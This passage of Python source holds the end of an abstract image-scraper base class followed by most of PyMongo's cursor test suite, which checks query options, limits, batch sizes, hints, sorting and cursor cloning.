'''
pass
@abstractmethod
def get_downloaded_list_name(self, category):
'''Provide name for downloaded list file.
This file is used to check whether a image has been downloaded.
e.g.:
return "iyi8_" + category + ".txt"
'''
pass
@abstractmethod
def get_image_tags_on_page(self, soup):
'''Provide image html tag that contain image url
e.g.:
return soup.find_all("div", class_="item")
'''
pass
@abstractmethod
def get_image_page_url(self, index, first_url):
'''Provide image page url based on first_url and index
e.g.:
index 0 (first_url): "http://www.iyi8.com/2017/mm_1225/2928.html"
index 3: "http://www.iyi8.com/2017/mm_1225/2928_3.html"
'''
pass
@abstractmethod
def get_image_info(self, soup):
'''Find image url and image name in soup
e.g.:
(sometimes you can locate the parent element of 'img' tag first)
parent = soup.find("div", class_="tupian")
img_url = parent.a.img['src']
file_name = parent.a.img['alt']
'''
pass
def download_images(self, multi_thread=False):
'''Download images of all categories'''
start_urls = self.get_category_urls()
print(start_urls)
if multi_thread:
for url, c in start_urls.items():
work_thread = threading.Thread(target=self._download_images_category, args=(url, c))
work_thread.start()
else:
for url, c in start_urls.items():
self._download_images_category(url, c)
def _download_images_category(self, first_url, category):
'''Download images of specific category'''
DIR_NAME = self.get_download_folder_path()
try:
if not os.path.exists(DIR_NAME):
os.makedirs(DIR_NAME)
except:
pass
# download images from every page
MAX_PAGE = 1000
for page_index in range(MAX_PAGE):
page_url = self.get_page_url(page_index, first_url)
resp = requests.get(page_url)
if resp.status_code != 200:
return
soup = BeautifulSoup(resp.text, "lxml")
self._download_images_on_page(soup, category)
def _download_images_on_page(self, soup, category):
'''Download iamges of specific category of one page'''
tags = self.get_image_tags_on_page(soup)
for tag in tags:
a = tag.a
if a is not None:
image_page_first_url = tag.a['href']
IMAGE_PAGE_COUNT = 100
for i in range(IMAGE_PAGE_COUNT):
image_page_url = self.get_image_page_url(i, image_page_first_url)
r = requests.get(image_page_url)
if r.status_code == 200:
soup = BeautifulSoup(r.text, "lxml")
try:
self._download_image(soup, i, category)
except Exception as e:
print(e)
continue
else:
break
def _download_image(self, soup, index, category):
'''Find real url and name of image in soup and download it'''
img_url, file_name = self.get_image_info(soup)
dir_path = self.get_download_folder_path()
list_name = self.get_downloaded_list_name(category)
if bsUtil.check_downloaded(img_url, list_name=dir_path + "/" + list_name):
return
with open(dir_path + "/" + list_name, "a+") as f:
f.write(img_url + "\n")
path = self.get_download_folder_path()
category_dir = path + "/" + category + "/"
bsUtil.download(img_url, file_name, file_name + "_" + str(index) + ".jpg", category_dir)
# to avoid IP banned, you can use a better strategy
time.sleep(10)
|
test_cursor.py
|
# Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the cursor module."""
import copy
import gc
import itertools
import random
import re
import sys
import time
import threading
import warnings
sys.path[0:0] = [""]
from bson import decode_all
from bson.code import Code
from bson.py3compat import PY3
from bson.son import SON
from pymongo import (ASCENDING,
DESCENDING,
ALL,
OFF)
from pymongo.collation import Collation
from pymongo.cursor import Cursor, CursorType
from pymongo.errors import (ConfigurationError,
ExecutionTimeout,
InvalidOperation,
OperationFailure)
from pymongo.read_concern import ReadConcern
from pymongo.read_preferences import ReadPreference
from test import (client_context,
unittest,
IntegrationTest)
from test.utils import (EventListener,
ignore_deprecations,
rs_or_single_client,
WhiteListEventListener)
if PY3:
long = int
class TestCursor(IntegrationTest):
def test_deepcopy_cursor_littered_with_regexes(self):
cursor = self.db.test.find({
"x": re.compile("^hmmm.*"),
"y": [re.compile("^hmm.*")],
"z": {"a": [re.compile("^hm.*")]},
re.compile("^key.*"): {"a": [re.compile("^hm.*")]}})
cursor2 = copy.deepcopy(cursor)
self.assertEqual(cursor._Cursor__spec, cursor2._Cursor__spec)
def test_add_remove_option(self):
cursor = self.db.test.find()
self.assertEqual(0, cursor._Cursor__query_flags)
cursor.add_option(2)
cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE)
self.assertEqual(2, cursor2._Cursor__query_flags)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
cursor.add_option(32)
cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE_AWAIT)
self.assertEqual(34, cursor2._Cursor__query_flags)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
cursor.add_option(128)
cursor2 = self.db.test.find(
cursor_type=CursorType.TAILABLE_AWAIT).add_option(128)
self.assertEqual(162, cursor2._Cursor__query_flags)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
self.assertEqual(162, cursor._Cursor__query_flags)
cursor.add_option(128)
self.assertEqual(162, cursor._Cursor__query_flags)
cursor.remove_option(128)
cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE_AWAIT)
self.assertEqual(34, cursor2._Cursor__query_flags)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
cursor.remove_option(32)
cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE)
self.assertEqual(2, cursor2._Cursor__query_flags)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
self.assertEqual(2, cursor._Cursor__query_flags)
cursor.remove_option(32)
self.assertEqual(2, cursor._Cursor__query_flags)
# Timeout
cursor = self.db.test.find(no_cursor_timeout=True)
self.assertEqual(16, cursor._Cursor__query_flags)
cursor2 = self.db.test.find().add_option(16)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
cursor.remove_option(16)
self.assertEqual(0, cursor._Cursor__query_flags)
# Tailable / Await data
cursor = self.db.test.find(cursor_type=CursorType.TAILABLE_AWAIT)
self.assertEqual(34, cursor._Cursor__query_flags)
cursor2 = self.db.test.find().add_option(34)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
cursor.remove_option(32)
self.assertEqual(2, cursor._Cursor__query_flags)
# Partial
cursor = self.db.test.find(allow_partial_results=True)
self.assertEqual(128, cursor._Cursor__query_flags)
cursor2 = self.db.test.find().add_option(128)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
cursor.remove_option(128)
self.assertEqual(0, cursor._Cursor__query_flags)
def test_add_remove_option_exhaust(self):
# Exhaust - which mongos doesn't support
if client_context.is_mongos:
with self.assertRaises(InvalidOperation):
self.db.test.find(cursor_type=CursorType.EXHAUST)
else:
cursor = self.db.test.find(cursor_type=CursorType.EXHAUST)
self.assertEqual(64, cursor._Cursor__query_flags)
cursor2 = self.db.test.find().add_option(64)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
self.assertTrue(cursor._Cursor__exhaust)
cursor.remove_option(64)
self.assertEqual(0, cursor._Cursor__query_flags)
self.assertFalse(cursor._Cursor__exhaust)
def test_allow_disk_use(self):
db = self.db
db.pymongo_test.drop()
coll = db.pymongo_test
self.assertRaises(TypeError, coll.find().allow_disk_use, 'baz')
cursor = coll.find().allow_disk_use(True)
self.assertEqual(True, cursor._Cursor__allow_disk_use)
cursor = coll.find().allow_disk_use(False)
self.assertEqual(False, cursor._Cursor__allow_disk_use)
def test_max_time_ms(self):
db = self.db
db.pymongo_test.drop()
coll = db.pymongo_test
self.assertRaises(TypeError, coll.find().max_time_ms, 'foo')
coll.insert_one({"amalia": 1})
coll.insert_one({"amalia": 2})
coll.find().max_time_ms(None)
coll.find().max_time_ms(long(1))
cursor = coll.find().max_time_ms(999)
self.assertEqual(999, cursor._Cursor__max_time_ms)
cursor = coll.find().max_time_ms(10).max_time_ms(1000)
self.assertEqual(1000, cursor._Cursor__max_time_ms)
cursor = coll.find().max_time_ms(999)
c2 = cursor.clone()
self.assertEqual(999, c2._Cursor__max_time_ms)
self.assertTrue("$maxTimeMS" in cursor._Cursor__query_spec())
self.assertTrue("$maxTimeMS" in c2._Cursor__query_spec())
self.assertTrue(coll.find_one(max_time_ms=1000))
client = self.client
if (not client_context.is_mongos
and client_context.test_commands_enabled):
# Cursor parses server timeout error in response to initial query.
client.admin.command("configureFailPoint",
"maxTimeAlwaysTimeOut",
mode="alwaysOn")
try:
cursor = coll.find().max_time_ms(1)
try:
next(cursor)
except ExecutionTimeout:
pass
else:
self.fail("ExecutionTimeout not raised")
self.assertRaises(ExecutionTimeout,
coll.find_one, max_time_ms=1)
finally:
client.admin.command("configureFailPoint",
"maxTimeAlwaysTimeOut",
mode="off")
@client_context.require_version_min(3, 1, 9, -1)
def test_max_await_time_ms(self):
db = self.db
db.pymongo_test.drop()
coll = db.create_collection("pymongo_test", capped=True, size=4096)
self.assertRaises(TypeError, coll.find().max_await_time_ms, 'foo')
coll.insert_one({"amalia": 1})
coll.insert_one({"amalia": 2})
coll.find().max_await_time_ms(None)
coll.find().max_await_time_ms(long(1))
# When cursor is not tailable_await
cursor = coll.find()
self.assertEqual(None, cursor._Cursor__max_await_time_ms)
cursor = coll.find().max_await_time_ms(99)
self.assertEqual(None, cursor._Cursor__max_await_time_ms)
# If cursor is tailable_await and timeout is unset
cursor = coll.find(cursor_type=CursorType.TAILABLE_AWAIT)
self.assertEqual(None, cursor._Cursor__max_await_time_ms)
# If cursor is tailable_await and timeout is set
cursor = coll.find(
cursor_type=CursorType.TAILABLE_AWAIT).max_await_time_ms(99)
self.assertEqual(99, cursor._Cursor__max_await_time_ms)
cursor = coll.find(
cursor_type=CursorType.TAILABLE_AWAIT).max_await_time_ms(
10).max_await_time_ms(90)
self.assertEqual(90, cursor._Cursor__max_await_time_ms)
listener = WhiteListEventListener('find', 'getMore')
coll = rs_or_single_client(
event_listeners=[listener])[self.db.name].pymongo_test
results = listener.results
# Tailable_await defaults.
list(coll.find(cursor_type=CursorType.TAILABLE_AWAIT))
# find
self.assertFalse('maxTimeMS' in results['started'][0].command)
# getMore
self.assertFalse('maxTimeMS' in results['started'][1].command)
results.clear()
# Tailable_await with max_await_time_ms set.
list(coll.find(
cursor_type=CursorType.TAILABLE_AWAIT).max_await_time_ms(99))
# find
self.assertEqual('find', results['started'][0].command_name)
self.assertFalse('maxTimeMS' in results['started'][0].command)
# getMore
self.assertEqual('getMore', results['started'][1].command_name)
self.assertTrue('maxTimeMS' in results['started'][1].command)
self.assertEqual(99, results['started'][1].command['maxTimeMS'])
results.clear()
# Tailable_await with max_time_ms
list(coll.find(
cursor_type=CursorType.TAILABLE_AWAIT).max_time_ms(99))
# find
self.assertEqual('find', results['started'][0].command_name)
self.assertTrue('maxTimeMS' in results['started'][0].command)
self.assertEqual(99, results['started'][0].command['maxTimeMS'])
# getMore
self.assertEqual('getMore', results['started'][1].command_name)
self.assertFalse('maxTimeMS' in results['started'][1].command)
results.clear()
# Tailable_await with both max_time_ms and max_await_time_ms
list(coll.find(
cursor_type=CursorType.TAILABLE_AWAIT).max_time_ms(
99).max_await_time_ms(99))
# find
self.assertEqual('find', results['started'][0].command_name)
self.assertTrue('maxTimeMS' in results['started'][0].command)
self.assertEqual(99, results['started'][0].command['maxTimeMS'])
# getMore
self.assertEqual('getMore', results['started'][1].command_name)
self.assertTrue('maxTimeMS' in results['started'][1].command)
self.assertEqual(99, results['started'][1].command['maxTimeMS'])
results.clear()
# Non tailable_await with max_await_time_ms
list(coll.find(batch_size=1).max_await_time_ms(99))
# find
self.assertEqual('find', results['started'][0].command_name)
self.assertFalse('maxTimeMS' in results['started'][0].command)
# getMore
self.assertEqual('getMore', results['started'][1].command_name)
self.assertFalse('maxTimeMS' in results['started'][1].command)
results.clear()
# Non tailable_await with max_time_ms
list(coll.find(batch_size=1).max_time_ms(99))
# find
self.assertEqual('find', results['started'][0].command_name)
self.assertTrue('maxTimeMS' in results['started'][0].command)
self.assertEqual(99, results['started'][0].command['maxTimeMS'])
# getMore
self.assertEqual('getMore', results['started'][1].command_name)
self.assertFalse('maxTimeMS' in results['started'][1].command)
# Non tailable_await with both max_time_ms and max_await_time_ms
list(coll.find(batch_size=1).max_time_ms(99).max_await_time_ms(88))
# find
self.assertEqual('find', results['started'][0].command_name)
self.assertTrue('maxTimeMS' in results['started'][0].command)
self.assertEqual(99, results['started'][0].command['maxTimeMS'])
# getMore
self.assertEqual('getMore', results['started'][1].command_name)
self.assertFalse('maxTimeMS' in results['started'][1].command)
@client_context.require_test_commands
@client_context.require_no_mongos
def test_max_time_ms_getmore(self):
# Test that Cursor handles server timeout error in response to getmore.
coll = self.db.pymongo_test
coll.insert_many([{} for _ in range(200)])
cursor = coll.find().max_time_ms(100)
# Send initial query before turning on failpoint.
next(cursor)
self.client.admin.command("configureFailPoint",
"maxTimeAlwaysTimeOut",
mode="alwaysOn")
try:
try:
# Iterate up to first getmore.
list(cursor)
except ExecutionTimeout:
pass
else:
self.fail("ExecutionTimeout not raised")
finally:
self.client.admin.command("configureFailPoint",
"maxTimeAlwaysTimeOut",
mode="off")
def test_explain(self):
a = self.db.test.find()
a.explain()
for _ in a:
break
b = a.explain()
# "cursor" pre MongoDB 2.7.6, "executionStats" post
self.assertTrue("cursor" in b or "executionStats" in b)
def test_explain_with_read_concern(self):
# Do not add readConcern level to explain.
listener = WhiteListEventListener("explain")
client = rs_or_single_client(event_listeners=[listener])
self.addCleanup(client.close)
coll = client.pymongo_test.test.with_options(
read_concern=ReadConcern(level="local"))
self.assertTrue(coll.find().explain())
started = listener.results['started']
self.assertEqual(len(started), 1)
self.assertNotIn("readConcern", started[0].command)
def test_hint(self):
db = self.db
self.assertRaises(TypeError, db.test.find().hint, 5.5)
db.test.drop()
db.test.insert_many([{"num": i, "foo": i} for i in range(100)])
self.assertRaises(OperationFailure,
db.test.find({"num": 17, "foo": 17})
.hint([("num", ASCENDING)]).explain)
self.assertRaises(OperationFailure,
db.test.find({"num": 17, "foo": 17})
.hint([("foo", ASCENDING)]).explain)
spec = [("num", DESCENDING)]
index = db.test.create_index(spec)
first = next(db.test.find())
self.assertEqual(0, first.get('num'))
first = next(db.test.find().hint(spec))
self.assertEqual(99, first.get('num'))
self.assertRaises(OperationFailure,
db.test.find({"num": 17, "foo": 17})
.hint([("foo", ASCENDING)]).explain)
a = db.test.find({"num": 17})
a.hint(spec)
for _ in a:
break
self.assertRaises(InvalidOperation, a.hint, spec)
def test_hint_by_name(self):
db = self.db
db.test.drop()
db.test.insert_many([{"i": i} for i in range(100)])
db.test.create_index([('i', DESCENDING)], name='fooindex')
first = next(db.test.find())
self.assertEqual(0, first.get('i'))
first = next(db.test.find().hint('fooindex'))
self.assertEqual(99, first.get('i'))
def test_limit(self):
db = self.db
self.assertRaises(TypeError, db.test.find().limit, None)
self.assertRaises(TypeError, db.test.find().limit, "hello")
self.assertRaises(TypeError, db.test.find().limit, 5.5)
self.assertTrue(db.test.find().limit(long(5)))
db.test.drop()
db.test.insert_many([{"x": i} for i in range(100)])
count = 0
for _ in db.test.find():
count += 1
self.assertEqual(count, 100)
count = 0
for _ in db.test.find().limit(20):
count += 1
self.assertEqual(count, 20)
count = 0
for _ in db.test.find().limit(99):
count += 1
self.assertEqual(count, 99)
count = 0
for _ in db.test.find().limit(1):
count += 1
self.assertEqual(count, 1)
count = 0
for _ in db.test.find().limit(0):
count += 1
self.assertEqual(count, 100)
count = 0
for _ in db.test.find().limit(0).limit(50).limit(10):
count += 1
self.assertEqual(count, 10)
a = db.test.find()
a.limit(10)
for _ in a:
break
self.assertRaises(InvalidOperation, a.limit, 5)
@ignore_deprecations # Ignore max without hint.
def test_max(self):
db = self.db
db.test.drop()
j_index = [("j", ASCENDING)]
db.test.create_index(j_index)
db.test.insert_many([{"j": j, "k": j} for j in range(10)])
def find(max_spec, expected_index):
cursor = db.test.find().max(max_spec)
if client_context.requires_hint_with_min_max_queries:
cursor = cursor.hint(expected_index)
return cursor
cursor = find([("j", 3)], j_index)
self.assertEqual(len(list(cursor)), 3)
# Tuple.
cursor = find((("j", 3),), j_index)
self.assertEqual(len(list(cursor)), 3)
# Compound index.
index_keys = [("j", ASCENDING), ("k", ASCENDING)]
db.test.create_index(index_keys)
cursor = find([("j", 3), ("k", 3)], index_keys)
self.assertEqual(len(list(cursor)), 3)
# Wrong order.
cursor = find([("k", 3), ("j", 3)], index_keys)
self.assertRaises(OperationFailure, list, cursor)
# No such index.
cursor = find([("k", 3)], "k")
self.assertRaises(OperationFailure, list, cursor)
self.assertRaises(TypeError, db.test.find().max, 10)
self.assertRaises(TypeError, db.test.find().max, {"j": 10})
@ignore_deprecations # Ignore min without hint.
def test_min(self):
db = self.db
db.test.drop()
j_index = [("j", ASCENDING)]
db.test.create_index(j_index)
db.test.insert_many([{"j": j, "k": j} for j in range(10)])
def find(min_spec, expected_index):
cursor = db.test.find().min(min_spec)
if client_context.requires_hint_with_min_max_queries:
cursor = cursor.hint(expected_index)
return cursor
cursor = find([("j", 3)], j_index)
self.assertEqual(len(list(cursor)), 7)
# Tuple.
cursor = find((("j", 3),), j_index)
self.assertEqual(len(list(cursor)), 7)
# Compound index.
index_keys = [("j", ASCENDING), ("k", ASCENDING)]
db.test.create_index(index_keys)
cursor = find([("j", 3), ("k", 3)], index_keys)
self.assertEqual(len(list(cursor)), 7)
# Wrong order.
cursor = find([("k", 3), ("j", 3)], index_keys)
self.assertRaises(OperationFailure, list, cursor)
# No such index.
cursor = find([("k", 3)], "k")
self.assertRaises(OperationFailure, list, cursor)
self.assertRaises(TypeError, db.test.find().min, 10)
self.assertRaises(TypeError, db.test.find().min, {"j": 10})
@client_context.require_version_max(4, 1, -1)
def test_min_max_without_hint(self):
coll = self.db.test
j_index = [("j", ASCENDING)]
coll.create_index(j_index)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("default", DeprecationWarning)
list(coll.find().min([("j", 3)]))
self.assertIn('using a min/max query operator', str(warns[0]))
# Ensure the warning is raised with the proper stack level.
del warns[:]
list(coll.find().min([("j", 3)]))
self.assertIn('using a min/max query operator', str(warns[0]))
del warns[:]
list(coll.find().max([("j", 3)]))
self.assertIn('using a min/max query operator', str(warns[0]))
def test_batch_size(self):
db = self.db
db.test.drop()
db.test.insert_many([{"x": x} for x in range(200)])
self.assertRaises(TypeError, db.test.find().batch_size, None)
self.assertRaises(TypeError, db.test.find().batch_size, "hello")
self.assertRaises(TypeError, db.test.find().batch_size, 5.5)
self.assertRaises(ValueError, db.test.find().batch_size, -1)
self.assertTrue(db.test.find().batch_size(long(5)))
a = db.test.find()
for _ in a:
break
self.assertRaises(InvalidOperation, a.batch_size, 5)
def cursor_count(cursor, expected_count):
count = 0
for _ in cursor:
count += 1
self.assertEqual(expected_count, count)
cursor_count(db.test.find().batch_size(0), 200)
cursor_count(db.test.find().batch_size(1), 200)
cursor_count(db.test.find().batch_size(2), 200)
cursor_count(db.test.find().batch_size(5), 200)
cursor_count(db.test.find().batch_size(100), 200)
cursor_count(db.test.find().batch_size(500), 200)
cursor_count(db.test.find().batch_size(0).limit(1), 1)
cursor_count(db.test.find().batch_size(1).limit(1), 1)
cursor_count(db.test.find().batch_size(2).limit(1), 1)
cursor_count(db.test.find().batch_size(5).limit(1), 1)
cursor_count(db.test.find().batch_size(100).limit(1), 1)
cursor_count(db.test.find().batch_size(500).limit(1), 1)
cursor_count(db.test.find().batch_size(0).limit(10), 10)
cursor_count(db.test.find().batch_size(1).limit(10), 10)
cursor_count(db.test.find().batch_size(2).limit(10), 10)
cursor_count(db.test.find().batch_size(5).limit(10), 10)
cursor_count(db.test.find().batch_size(100).limit(10), 10)
cursor_count(db.test.find().batch_size(500).limit(10), 10)
cur = db.test.find().batch_size(1)
next(cur)
if client_context.version.at_least(3, 1, 9):
# find command batchSize should be 1
self.assertEqual(0, len(cur._Cursor__data))
else:
# OP_QUERY ntoreturn should be 2
self.assertEqual(1, len(cur._Cursor__data))
next(cur)
self.assertEqual(0, len(cur._Cursor__data))
next(cur)
self.assertEqual(0, len(cur._Cursor__data))
next(cur)
self.assertEqual(0, len(cur._Cursor__data))
def test_limit_and_batch_size(self):
db = self.db
db.test.drop()
db.test.insert_many([{"x": x} for x in range(500)])
curs = db.test.find().limit(0).batch_size(10)
next(curs)
self.assertEqual(10, curs._Cursor__retrieved)
curs = db.test.find(limit=0, batch_size=10)
next(curs)
self.assertEqual(10, curs._Cursor__retrieved)
curs = db.test.find().limit(-2).batch_size(0)
next(curs)
self.assertEqual(2, curs._Cursor__retrieved)
curs = db.test.find(limit=-2, batch_size=0)
next(curs)
self.assertEqual(2, curs._Cursor__retrieved)
curs = db.test.find().limit(-4).batch_size(5)
next(curs)
self.assertEqual(4, curs._Cursor__retrieved)
curs = db.test.find(limit=-4, batch_size=5)
next(curs)
self.assertEqual(4, curs._Cursor__retrieved)
curs = db.test.find().limit(50).batch_size(500)
next(curs)
self.assertEqual(50, curs._Cursor__retrieved)
curs = db.test.find(limit=50, batch_size=500)
next(curs)
self.assertEqual(50, curs._Cursor__retrieved)
curs = db.test.find().batch_size(500)
next(curs)
self.assertEqual(500, curs._Cursor__retrieved)
curs = db.test.find(batch_size=500)
next(curs)
self.assertEqual(500, curs._Cursor__retrieved)
curs = db.test.find().limit(50)
next(curs)
self.assertEqual(50, curs._Cursor__retrieved)
curs = db.test.find(limit=50)
next(curs)
self.assertEqual(50, curs._Cursor__retrieved)
# these two might be shaky, as the default
# is set by the server. as of 2.0.0-rc0, 101
# or 1MB (whichever is smaller) is default
# for queries without ntoreturn
curs = db.test.find()
next(curs)
self.assertEqual(101, curs._Cursor__retrieved)
curs = db.test.find().limit(0).batch_size(0)
next(curs)
self.assertEqual(101, curs._Cursor__retrieved)
curs = db.test.find(limit=0, batch_size=0)
next(curs)
self.assertEqual(101, curs._Cursor__retrieved)
def test_skip(self):
db = self.db
self.assertRaises(TypeError, db.test.find().skip, None)
self.assertRaises(TypeError, db.test.find().skip, "hello")
self.assertRaises(TypeError, db.test.find().skip, 5.5)
self.assertRaises(ValueError, db.test.find().skip, -5)
self.assertTrue(db.test.find().skip(long(5)))
db.drop_collection("test")
db.test.insert_many([{"x": i} for i in range(100)])
for i in db.test.find():
self.assertEqual(i["x"], 0)
break
for i in db.test.find().skip(20):
self.assertEqual(i["x"], 20)
break
for i in db.test.find().skip(99):
self.assertEqual(i["x"], 99)
break
for i in db.test.find().skip(1):
self.assertEqual(i["x"], 1)
break
for i in db.test.find().skip(0):
self.assertEqual(i["x"], 0)
break
for i in db.test.find().skip(0).skip(50).skip(10):
self.assertEqual(i["x"], 10)
break
for i in db.test.find().skip(1000):
self.fail()
a = db.test.find()
a.skip(10)
for _ in a:
break
self.assertRaises(InvalidOperation, a.skip, 5)
def test_sort(self):
db = self.db
self.assertRaises(TypeError, db.test.find().sort, 5)
self.assertRaises(ValueError, db.test.find().sort, [])
self.assertRaises(TypeError, db.test.find().sort, [], ASCENDING)
self.assertRaises(TypeError, db.test.find().sort,
[("hello", DESCENDING)], DESCENDING)
db.test.drop()
unsort = list(range(10))
random.shuffle(unsort)
db.test.insert_many([{"x": i} for i in unsort])
asc = [i["x"] for i in db.test.find().sort("x", ASCENDING)]
self.assertEqual(asc, list(range(10)))
asc = [i["x"] for i in db.test.find().sort("x")]
self.assertEqual(asc, list(range(10)))
asc = [i["x"] for i in db.test.find().sort([("x", ASCENDING)])]
self.assertEqual(asc, list(range(10)))
expect = list(reversed(range(10)))
desc = [i["x"] for i in db.test.find().sort("x", DESCENDING)]
self.assertEqual(desc, expect)
desc = [i["x"] for i in db.test.find().sort([("x", DESCENDING)])]
self.assertEqual(desc, expect)
desc = [i["x"] for i in
db.test.find().sort("x", ASCENDING).sort("x", DESCENDING)]
self.assertEqual(desc, expect)
expected = [(1, 5), (2, 5), (0, 3), (7, 3), (9, 2), (2, 1), (3, 1)]
shuffled = list(expected)
random.shuffle(shuffled)
db.test.drop()
for (a, b) in shuffled:
db.test.insert_one({"a": a, "b": b})
result = [(i["a"], i["b"]) for i in
db.test.find().sort([("b", DESCENDING),
("a", ASCENDING)])]
self.assertEqual(result, expected)
a = db.test.find()
a.sort("x", ASCENDING)
for _ in a:
break
self.assertRaises(InvalidOperation, a.sort, "x", ASCENDING)
@ignore_deprecations
def test_count(self):
db = self.db
db.test.drop()
self.assertEqual(0, db.test.find().count())
db.test.insert_many([{"x": i} for i in range(10)])
self.assertEqual(10, db.test.find().count())
self.assertTrue(isinstance(db.test.find().count(), int))
self.assertEqual(10, db.test.find().limit(5).count())
self.assertEqual(10, db.test.find().skip(5).count())
self.assertEqual(1, db.test.find({"x": 1}).count())
self.assertEqual(5, db.test.find({"x": {"$lt": 5}}).count())
a = db.test.find()
b = a.count()
for _ in a:
break
self.assertEqual(b, a.count())
self.assertEqual(0, db.test.acollectionthatdoesntexist.find().count())
@ignore_deprecations
def test_count_with_hint(self):
collection = self.db.test
collection.drop()
collection.insert_many([{'i': 1}, {'i': 2}])
self.assertEqual(2, collection.find().count())
collection.create_index([('i', 1)])
self.assertEqual(1, collection.find({'i': 1}).hint("_id_").count())
self.assertEqual(2, collection.find().hint("_id_").count())
self.assertRaises(OperationFailure,
collection.find({'i': 1}).hint("BAD HINT").count)
# Create a sparse index which should have no entries.
collection.create_index([('x', 1)], sparse=True)
self.assertEqual(0, collection.find({'i': 1}).hint("x_1").count())
self.assertEqual(
0, collection.find({'i': 1}).hint([("x", 1)]).count())
if client_context.version.at_least(3, 3, 2):
self.assertEqual(0, collection.find().hint("x_1").count())
self.assertEqual(0, collection.find().hint([("x", 1)]).count())
else:
self.assertEqual(2, collection.find().hint("x_1").count())
self.assertEqual(2, collection.find().hint([("x", 1)]).count())
@ignore_deprecations
def test_where(self):
db = self.db
db.test.drop()
a = db.test.find()
self.assertRaises(TypeError, a.where, 5)
self.assertRaises(TypeError, a.where, None)
self.assertRaises(TypeError, a.where, {})
db.test.insert_many([{"x": i} for i in range(10)])
self.assertEqual(3, len(list(db.test.find().where('this.x < 3'))))
self.assertEqual(3,
len(list(db.test.find().where(Code('this.x < 3')))))
code_with_scope = Code('this.x < i', {"i": 3})
if client_context.version.at_least(4, 3, 3):
# MongoDB 4.4 removed support for Code with scope.
with self.assertRaises(OperationFailure):
list(db.test.find().where(code_with_scope))
code_with_empty_scope = Code('this.x < 3', {})
with self.assertRaises(OperationFailure):
list(db.test.find().where(code_with_empty_scope))
else:
self.assertEqual(
3, len(list(db.test.find().where(code_with_scope))))
self.assertEqual(10, len(list(db.test.find())))
self.assertEqual(3, db.test.find().where('this.x < 3').count())
self.assertEqual(10, db.test.find().count())
self.assertEqual(3, db.test.find().where(u'this.x < 3').count())
self.assertEqual([0, 1, 2],
[a["x"] for a in
db.test.find().where('this.x < 3')])
self.assertEqual([],
[a["x"] for a in
db.test.find({"x": 5}).where('this.x < 3')])
self.assertEqual([5],
[a["x"] for a in
db.test.find({"x": 5}).where('this.x > 3')])
cursor = db.test.find().where('this.x < 3').where('this.x > 7')
self.assertEqual([8, 9], [a["x"] for a in cursor])
a = db.test.find()
b = a.where('this.x > 3')
for _ in a:
break
self.assertRaises(InvalidOperation, a.where, 'this.x < 3')
def test_rewind(self):
self.db.test.insert_many([{"x": i} for i in range(1, 4)])
cursor = self.db.test.find().limit(2)
count = 0
for _ in cursor:
count += 1
self.assertEqual(2, count)
count = 0
for _ in cursor:
count += 1
self.assertEqual(0, count)
cursor.rewind()
count = 0
for _ in cursor:
count += 1
self.assertEqual(2, count)
cursor.rewind()
count = 0
for _ in cursor:
break
cursor.rewind()
for _ in cursor:
count += 1
self.assertEqual(2, count)
self.assertEqual(cursor, cursor.rewind())
def test_clone(self):
self.db.test.insert_many([{"x": i} for i in range(1, 4)])
cursor = self.db.test.find().limit(2)
count = 0
for _ in cursor:
count += 1
self.assertEqual(2, count)
count = 0
for _ in cursor:
count += 1
self.assertEqual(0, count)
cursor = cursor.clone()
cursor2 = cursor.clone()
count = 0
for _ in cursor:
count += 1
self.assertEqual(2, count)
for _ in cursor2:
count += 1
self.assertEqual(4, count)
cursor.rewind()
count = 0
for _ in cursor:
break
cursor = cursor.clone()
for _ in cursor:
count += 1
self.assertEqual(2, count)
self.assertNotEqual(cursor, cursor.clone())
# Just test attributes
cursor = self.db.test.find({"x": re.compile("^hello.*")},
skip=1,
no_cursor_timeout=True,
cursor_type=CursorType.TAILABLE_AWAIT,
allow_partial_results=True,
manipulate=False,
projection={'_id': False}).limit(2)
cursor.min([('a', 1)]).max([('b', 3)])
cursor.add_option(128)
cursor.comment('hi!')
cursor2 = cursor.clone()
self.assertEqual(cursor._Cursor__skip, cursor2._Cursor__skip)
self.assertEqual(cursor._Cursor__limit, cursor2._Cursor__limit)
self.assertEqual(type(cursor._Cursor__codec_options),
type(cursor2._Cursor__codec_options))
self.assertEqual(cursor._Cursor__manipulate,
cursor2._Cursor__manipulate)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
self.assertEqual(cursor._Cursor__comment,
cursor2._Cursor__comment)
self.assertEqual(cursor._Cursor__min,
cursor2._Cursor__min)
self.assertEqual(cursor._Cursor__max,
cursor2._Cursor__max)
# Shallow copies can so can mutate
cursor2 = copy.copy(cursor)
cursor2._Cursor__projection['cursor2'] = False
self.assertTrue('cursor2' in cursor._Cursor__projection)
# Deepcopies and shouldn't mutate
cursor3 = copy.deepcopy(cursor)
cursor3._Cursor__projection['cursor3'] = False
self.assertFalse('cursor3' in cursor._Cursor__projection)
cursor4 = cursor.clone()
cursor4._Cursor__projection['cursor4'] = False
self.assertFalse('cursor4' in cursor._Cursor__projection)
# Test memo when deepcopying queries
query = {"hello": "world"}
query["reflexive"] = query
cursor = self.db.test.find(query)
cursor2 = copy.deepcopy(cursor)
self.assertNotEqual(id(cursor._Cursor__spec),
